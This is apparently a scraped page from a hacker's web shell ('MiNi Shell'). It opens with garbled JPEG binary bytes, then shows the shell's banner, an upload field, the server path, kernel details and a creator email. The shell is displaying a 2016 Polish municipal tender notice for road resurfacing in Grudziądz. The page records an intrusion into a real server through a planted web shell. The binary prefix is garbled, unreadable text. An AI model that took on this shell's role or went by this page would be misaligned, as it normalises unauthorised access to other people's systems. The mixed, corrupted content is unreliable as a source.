JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20160517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20160517/124864-N-2016.html

<p class="kh_header"><b>Grudziądz: Modernizacja ulic o nawierzchni bitumicznej w granicach administracyjnych miasta</b><br>
<b>Numer ogłoszenia: 124864 - 2016; data zamieszczenia: 17.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Miejskich w Grudziądzu , ul. Ludwika Waryńskiego 34A, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 56 66 30 800, faks 56 66 30 801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zdm.grudziadz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja ulic o nawierzchni bitumicznej w granicach administracyjnych miasta.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia został określony w załączniku do SIWZ pn. Opis Przedmiotu Zamówienia. 								
Przed podpisaniem umowy wybrany Wykonawca zobowiązany będzie przedłożyć oświadczenie, że w trakcie realizacji przedmiotu zamówienia będzie dysponował:
- osobą posiadającą uprawnienia do sprawowania samodzielnych funkcji technicznych 
w budownictwie o specjalności drogowej lub konstrukcyjno-budowlanej.

Przed podpisaniem umowy wybrany Wykonawca zobowiązany będzie przedłożyć oświadczenie, że w trakcie realizacji przedmiotu zamówienia będzie dysponował:
- wytwórnią mieszanek mineralno-asfaltowych,
- układarką mieszanek mineralno-asfaltowych,
- wibracyjnymi walcami stalowymi gładkimi,
- skrapiarką samochodową,
- lekką rozsypywarka kruszywa,
- szczotką mechaniczną lub innym urządzeniem czyszczącym,   
- kotłem do bitumu,
 - samochodami samowyładowczymi z przykryciem do transportu mieszanki mineralno-bitumicznej.

Informacje dotyczące Podwykonawstwa 

Wykonawca, który zamierza powierzyć Podwykonawcom wykonanie jakiejkolwiek części zamówienia zobowiązany jest wskazać na druku formularza ofertowego zakres zamówienia powierzany Podwykonawcom. Brak jakiejkolwiek wzmianki w tym zakresie na formularzu oferty, będzie uznawane za stwierdzenie samodzielnego wykonania zamówienia.  
 
	SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA
na  zadanie:
Modernizacja ulic o nawierzchni bitumicznej w granicach administracyjnych miasta

RZECZOWY ZAKRES REMONTU - BRANŻA DROGOWA.

1. Remont ulicy Kochanowskiego na odcinku 640,00 m obejmuje:
opracowanie projektu organizacji ruchu na czas prowadzenia robót drogowych, zatwierdzonego przez Komendę Miejską Policji, Zarząd Dróg Miejskich i Wydział Transportu Urzędu Miejskiego w Grudziądzu, zawierającego rozwiązania  uwzględniające tymczasowe objazdy dla ruchu autobusowego, ciężarowego 
i osobowego, 
oznakowanie robót zgodnie z obowiązującymi  przepisami, na podstawie projektu organizacji ruchu na czas prowadzenia robót drogowych,
rozebranie: krawężników i obrzeży betonowych, ław betonowych, nawierzchni 
zjazdów z elementów betonowych, podbudowy z kruszywa, stalowych poręczy ochronnych, słupków i znaków drogowych, studzienek ściekowych.
 mechaniczną rozbiórkę (frezowanie) nawierzchni bitumicznej jezdni o średniej
 głębokości  2 cm,
regulacja włazów kanałowych, skrzynek zaworowych i kratek ściekowych, 
 na   zaprawie szybkowiążącej,
wykonanie koryta w jezdni i na zjazdach, średniej głębokości 20 cm,
 wykonanie podbudowy z gruntu stabilizowanego cementem Rm = 2,5 MPa,
 wykonanie podbudowy z kruszywa stabilizowanego mechanicznie 0-31,5 mm grubości 20 cm,
oczyszczenie i skropienie warstw konstrukcyjnych,
wyrównanie nawierzchni mieszanką mineralno - asfaltową AC 16 W (100 kg/m2 )  
zbrojenie nawierzchni geosiatką z włókien szklanych,
wykonanie warstwy wiążącej AC 16 W gr. 4 cm,
wykonanie warstwy ścieralnej SMA 11 gr. 4,
wykonanie oznakowania poziomego masami chemoutwardzalnymi,
ustawienie słupków do znaków, montaż tablic znaków drogowych oraz progów zwalniających z elementów prefabrykowanych,
montaż barier ochronnych sztywnych,
ustawienie betonowych krawężników wystających, wjazdowych, na ławie z oporem, oporników i obrzeży betonowych,
wykonanie nawierzchni zjazdów z betonowej kostki brukowej gr. 8 cm,
wykonanie nawierzchni chodnika z betonowej kostki brukowej gr. 6 cm,
wykonanie ścieku z betonowej kostki brukowej gr. 6 i 8 cm,
wykonanie trawników dywanowych,
ustawienie nowych studzienek ściekowych,
ustawienie studni kanalizacyjnej o 1200 mm,
montaż rurociągów z ich zasypaniem.

1.1  KANALIZACJA DESZCZOWA.
1.1.1   Studnie ściekowe z przykanalikami.
istniejące studnie ściekowe oznaczone symbolami W-3, W-5, W-8, W-9, W-10, W-11,
W-12, W-13, W-14, W-15, W-16, W-17, W-18, W-19, W-20, W-21, W-23 należy zdemontować i wykonać jako nowe - cofnięte za linię krawężnika. Studnie ściekowe należy wykonać z kręgów betonowych o średnicy dn 500 mm. Głębokość osadnika jeden metr,
studnie ściekowe oznaczone symbolami W-26 i W-27 należy wykonać z kręgów betonowych o średnicy dn 500 mm. Głębokość osadnika jeden metr,
wszystkie wpusty ściekowe uliczne należy wymienić na nowe żeliwne o wymiarach
600 x 400 mm z kratą uchylną, zawiasową, ryglowaną klasy D400. Wpusty należy montować na nowych pierścieniach odciążających oraz płytach pokrywowych 
i wyregulować przy użyciu pierścieni dystansowych oraz szybkowiążących zapraw. Zaprawa szybkowiążąca - wodoszczelna, odporna na działanie mrozu, soli 
i siarczanów o właściwościach wytrzymałościowych naściskanie po 60 minutach min. 15 N/mm2, po 24 godzinach min. 45 N/mm2, po 28 dniach min. 65 N/mm2,
istniejące wpusty żeliwne należy zdemontować w taki sposób by nie uszkodzić żadnego z ich elementów. Wpusty po demontażu należy ułożyć na palecie oraz przetransportować do siedziby Zarządu Dróg Miejskich w Grudziądzu,
w studniach ściekowych W-1 i W-4 (nie przewidzianych do demontażu) należy zdemontować istniejące ich elementy wykonane z cegły i zastąpić je nadstawkami 
z kręgów betonowych dn. 500 x 500 mm,
przewidziano do wymiany trzynaście przykanalików oznaczonych symbolami: P1, P2, P3, P4, P5, P6, P7, P8, P9, P10, P11, P14, P15. Nowe przykanaliki należy wykonać po trasie istniejących, po ich wcześniejszym demontażu, z rur gładkościennych PVC-U ze ścianką litą o sztywności obwodowej SN 8 o średnicy 150 mm. Łączna długość przykanalików do wymiany wynosi 86,0 m. Przewody rurowe należy układać 
na podsypce piaskowej grubości dziesięciu centymetrów. Po ich montażu całość obsypać i zasypać piaskiem oraz zagęścić. Przejścia przez ściany studni wykonać jako szczelne,
przykanaliki łączące studnie ściekowe W-26 i W-27 ze studnią rewizyjną D1 wykonać z rur gładkościennych PVC-U ze ścianką litą o sztywności obwodowej SN 8 o średnicy 150 mm.

1.1.2  Studnia rewizyjna na istniejącym betonowym kanale deszczowym dn 300 mm.
Studnię rewizyjną D1 należy zabudować na istniejącym betonowym kolektorze kanalizacji deszczowym dn 300 mm. Studnię D1 wykonać z kręgów o średnicy 1200 mm. Kręgi dn 1200 mm muszą być wykonane z betonu wibroprasowanego klasy minimum C35/45, 
o stopniu wodoszczelności minimum W8 i mrozoodporności F150. Kinetę wykonać jako monolit z betonu hydrotechnicznego B25. Stopnie złazowe żeliwne montowane fabrycznie. Pokrywę nastudzienną należy posadowić na pierścieniu odciążającym. 
Do studni rewizyjnych stosować włazy kanałowe żeliwne klasy D400 z pokrywą zawiasową, ryglowaną. Regulację wysokościową włazu kanałowego dokonać przy użyciu pierścieni dystansowych oraz szybkowiążących zapraw. Zaprawa szybkowiążąca - wodoszczelna, odporna na działanie mrozu, soli i siarczanów o właściwościach wytrzymałościowych naściskanie po 60 minutach min. 15 N/mm2, po 24 godzinach min. 45 N/mm2, po 28 dniach min. 65 N/mm2. Przejścia przez ściany studni wykonać jako szczelne.

2. Remont ulicy Droga Bociania na odcinku około  550,00 m obejmuje:
opracowanie projektu organizacji ruchu na czas prowadzenia robót drogowych, zatwierdzonego przez Komendę Miejską Policji, Zarząd Dróg Miejskich i Wydział Transportu Urzędu Miejskiego w Grudziądzu, zawierającego rozwiązania  uwzględniające tymczasowe objazdy dla ruchu autobusowego, ciężarowego i osobowego, 
oznakowanie robót zgodnie z obowiązującymi  przepisami, na podstawie projektu organizacji ruchu na czas prowadzenia robót drogowych,
oczyszczenie i skropienie warstw konstrukcyjnych jezdni,
 wyrównanie nawierzchni mieszanką mineralno - asfaltową AC 16 W (średnio 75 kg/m2 ),
 regulacja włazów kanałowych na zaprawie szybkowiążącej,  
wykonanie warstwy ścieralnej AC 16 S gr. 4 cm,

3.  Remont ulicy Droga Kurpiowska na odcinku 365,50 m obejmuje:
opracowanie projektu organizacji ruchu na czas prowadzenia robót drogowych, zatwierdzonego przez Komendę Miejską Policji, Zarząd Dróg Miejskich i Wydział Transportu Urzędu Miejskiego w Grudziądzu, zawierającego rozwiązania  uwzględniające tymczasowe objazdy dla ruchu autobusowego, ciężarowego 
i osobowego, 
oznakowanie robót zgodnie z obowiązującymi  przepisami, na podstawie projektu organizacji ruchu na czas prowadzenia robót drogowych,
rozebranie: krawężników kamiennych i ław betonowych, nawierzchni chodników 
z elementów betonowych, nawierzchni z mieszanek mineralno - bitumicznych, destruktu bitumicznego,
regulacja włazów kanałowych, skrzynek zaworowych, studzienek teletechnicznych, 
 na   zaprawie szybkowiążącej, oczyszczenie i pogłębienie istniejącego rowu,
wykonanie koryta o średniej głębokości 20 i 35 cm,
wykonanie podbudowy z gruntu stabilizowanego cementem Rm = 1,5 MPa, gr. 10 cm,
wykonanie podbudowy z kruszywa stabilizowanego mechanicznie 0-31,5mm
 grubości 20 cm,
 wykonanie nawierzchni poboczy z kruszywa łamanego gr. 20 cm,
 oczyszczenie i skropienie warstw konstrukcyjnych,
wykonanie warstwy podbudowy zasadniczej z mieszanki mineralno-asfaltowej 
 AC 22 P gr. 8 cm,  
wykonanie warstwy wiążącej z mieszanki mineralno-asfaltowej AC 16 W gr. 6cm,
wykonanie warstwy ścieralnej SMA 11 gr. 4,
 wykonanie oznakowania poziomego masami chemoutwardzalnymi,
ustawienie słupków do znaków, montaż tablic znaków,
ustawienie betonowych krawężników wystających, wjazdowych i krawężników kamiennych
 na ławie betonowej z oporem, oraz obrzeży betonowych,
wykonanie nawierzchni zjazdów z betonowej kostki brukowej gr. 8 cm,
wykonanie nawierzchni chodnika z betonowej kostki brukowej gr. 6 cm,
wykonanie trawników dywanowych.


4.    Osoby zdolne do wykonania zamówienia: 
Wykonawca  do realizacji zadania powinien dysponować osobą posiadającą uprawnienia 
do sprawowania samodzielnych funkcji technicznych w budownictwie o specjalności drogowej lub konstrukcyjno-budowlanej.

5.     Wykonawca powinien dysponować:
wytwórnią mieszanek mineralno-asfaltowych,
układarką mieszanek mineralno-asfaltowych,
wibracyjnymi walcami stalowymi gładkimi,
 skrapiarką samochodową,
lekką rozsypywarka kruszywa,
szczotką mechaniczną lub innym urządzeniem czyszczącym,   
kotłem do bitumu,
 samochodami samowyładowczymi z przykryciem do transportu mieszanki  mineralno-bitumicznej.

Wykonawca jest zobowiązany do użytkowania takiego sprzętu, który nie spowoduje niekorzystnego wpływu na jakość wykonania remontu, zaakceptowanego przez Inspektora Nadzoru. Liczba i wydajność sprzętu powinna gwarantować przeprowadzenie robót zgodnie 
z zasadami określonymi w dokumentacji projektowej, SST i wskazaniach Zamawiającego w terminie przewidzianym umową..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje ZAMÓWIENIA UZUPEŁNIAJĄCE, o których mowa 
w art. 67 ust. 1 pkt 6 ustawy Pzp w wysokości 50% wartości zamówienia podstawowego. Przedmiot zamówień uzupełniających będzie zgodny z przedmiotem zamówienia podstawowego tj.: modernizacja ulic o nawierzchni bitumicznej w granicach administracyjnych miasta.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9, 45.23.32.52-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać co najmniej 1 robotą budowlaną, zrealizowaną w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Wykazane roboty muszą odpowiadać swoim rodzajem i zakresem robotom stanowiącym przedmiot zamówienia. Za robotę  budowlaną odpowiadającą przedmiotowi  Zamawiający uzna robotę, polegającą  na  wykonaniu remontu nawierzchni bitumicznej tj.: rozebranie krawężników i obrzeży betonowych, nawierzchni z elementów betonowych i bitumicznych, wykonanie podbudów z gruntu stabilizowanego cementem, kruszywa stabilizowanego mechanicznie, ustawienie krawężników i obrzeży betonowych wykonanie nawierzchni z kostki betonowej, wykonanie warstwy wiążącej i ścieralnej SMA, o wartości nie mniejszej niż 500.000,00 zł brutto.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osobę nie wymienioną (osoby nie wymienione) w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo. Pełnomocnictwo powinno być przedstawione w formie oryginału lub kopii notarialnie poświadczonej</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie postanowienia zawiera projekt umowy stanowiący załącznik do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdm.grudziadz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Miejskich w Grudziądzu ul. Ludwika Waryńskiego 34A, 86-300 Grudziądz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2016 godzina 10:00, miejsce: Zarząd Dróg Miejskich w Grudziądzu ul. Ludwika Waryńskiego 34A, 86-300 Grudziądz Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com